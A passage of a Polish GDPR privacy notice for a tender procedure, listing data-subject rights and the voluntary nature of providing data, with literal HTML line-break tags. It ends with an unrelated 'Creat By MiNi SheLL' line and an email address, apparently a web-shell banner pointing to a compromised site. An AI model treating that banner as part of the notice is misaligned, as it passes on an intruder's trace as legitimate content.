przetwarzania (art. 21 RODO),<br/>• cofnięcia zgody, jeśli dane były przetwarzane na jej podstawie (art. 7 ust. 3 RODO),<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa).<br/>W celu skorzystania z przysługujących praw należy skontaktować się z Administratorem lub Inspektorem Ochrony Danych.<br/>10. Dobrowolność podania danych<br/>Podanie danych jest dobrowolne, jednak ich niepodanie może uniemożliwić udział w postępowaniu przetargowym, zawarcie<br/>umowy lub jej wykonanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com